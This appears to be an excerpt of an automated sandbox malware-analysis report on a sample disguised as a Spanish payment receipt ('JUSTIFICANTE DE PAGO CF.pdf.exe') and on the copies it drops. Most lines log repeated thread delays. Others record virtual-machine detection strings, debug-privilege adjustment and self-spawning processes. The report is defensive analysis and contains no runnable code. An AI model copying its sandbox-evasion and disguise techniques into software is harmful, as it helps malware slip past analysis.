                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98078Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97968Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97843Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97734Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97625Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97515Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97406Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97297Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97187Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97078Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96968Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96859Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96750Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96640Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96531Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96421Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96312Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 96203Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99953Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99719Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99610Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99485Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99344Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99218Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99109Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98891Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98766Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98656Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98547Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98438Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98313Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599637
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599516
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599406
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599297
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599188
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598844
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598734
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598624
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598515
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598406
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598297
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598187
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99890
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99781
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99672
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99562
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99453
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99344
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99234
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99124
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99015
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98906
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98797
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98687
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98577
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98469
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98359
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98250
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98140
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98031
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97922
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97812
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97703
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97594
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97484
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99968
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99640
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99531
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99093
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98984
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98765
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98656
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98502
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98264
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98041
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97852
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96578
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96092
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95984
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95765
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599875
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599653
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599437
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599328
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599218
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599110
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598985
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598860
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598735
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598610
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598485
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598360
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99874
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99763
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99655
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99545
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99437
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99327
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99218
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99108
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98999
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98889
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98780
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98671
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98562
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98452
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98343
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98234
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98124
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98014
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97906
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97796
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97686
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97577
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97468
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97358
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99890
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99776
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99672
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99562
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99453
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99343
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99234
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99125
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99015
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98906
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98796
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98687
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98578
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98468
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98359
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98249
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98140
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98030
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97921
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97812
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97702
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97593
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97476
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 97375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599890
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599672
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599547
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599438
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599313
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599195
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 599078
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598516
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598391
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598281
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 598151
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99875
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99766
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99526
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99313
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99188
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99063
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98954
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98829
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98704
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98579
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98454
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98329
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98204
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98079
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97954
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97829
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97703
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97594
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97485
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97360
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99640
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99531
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99007
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98862
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98734
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98498
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98391
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98281
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98157
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96883
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96761
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96656
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96547
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96094
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95969
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95641
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 95531
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "&vmware_soap_session
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                            Source: Reramvw.exe, 0000000A.00000002.3206524272.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1991439502.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253763956.0000000006310000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2151160347.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2230741842.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2325501173.0000000000615000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2406307664.0000000000890000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3206231909.000000000112D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                            Source: repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformationJump to behavior
